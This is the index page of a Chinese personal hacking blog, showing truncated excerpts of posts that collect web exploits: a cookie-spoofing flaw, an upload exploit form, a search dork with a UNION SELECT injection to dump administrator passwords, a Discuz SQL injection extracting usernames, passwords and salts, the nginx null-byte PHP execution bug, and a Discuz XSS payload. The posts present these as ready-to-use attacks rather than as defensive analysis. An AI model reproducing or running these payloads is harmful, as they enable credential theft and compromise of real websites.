小马博客

一个无聊的人,一个无聊的博客

网上出现的都是阿西网站推广系统的SQL漏洞,fans发现的cookie欺骗的漏洞貌似没人发过! [php]先看axphp.php的源码 ------------------------------------------------ <tr> <td>账号:</td> <td><form meth...

发布 0 条评论

利用前提:先随便注册一个账号--- 然后登录---再打开这个exp就可以了 [php]<form name="uploadForm" style="margin:0;padding:0;" method="post" enctype="multipart/form-data" action=&...

发布 0 条评论

教育站打印页面漏洞 百度或google搜索 inurl:info_Print.asp?ArticleID= 默认后台:/ad_login.asp 爆管理员密码: 在 域名/inurl:info_Print.asp?ArticleID=数字 union select 1,2,username,password,5,6,7,8,9,10,11,12,13,14,15,16...

发布 0 条评论

这个漏洞早就出来了,收集在我电脑里找不到了,写到博客上好记点! 1.注册个用户,登录 2.随便找个帖子回复! 回复内容 ↓ 注入语句: a',`subject`=(/*!select*/ concat(username,'|',password,'|',salt) from pre_ucenter_members where...

发布 1 条评论

Ngnix在遇到%00空字节时与后端FastCGI处理不一致,导致可以在图片中嵌入PHP代码然后通过访问xxx.jpg%00.php来执行其中的代码 影响版本: nginx 0.5.* nginx 0.6.* nginx 0.7 <= 0.7.65 nginx 0.8 <= 0.8.37

发布 0 条评论

原型:     [email][url][img]http://hkxm.tk onmouseover=alert(/DZ-xss-0day/); [/img][/url][/email] 发贴时勾选源码, 鸡肋在于,要鼠标触碰才能触发,但是,鼠标触碰还是概率很大很大的把上面的alert(/DZ-X...

发布 0 条评论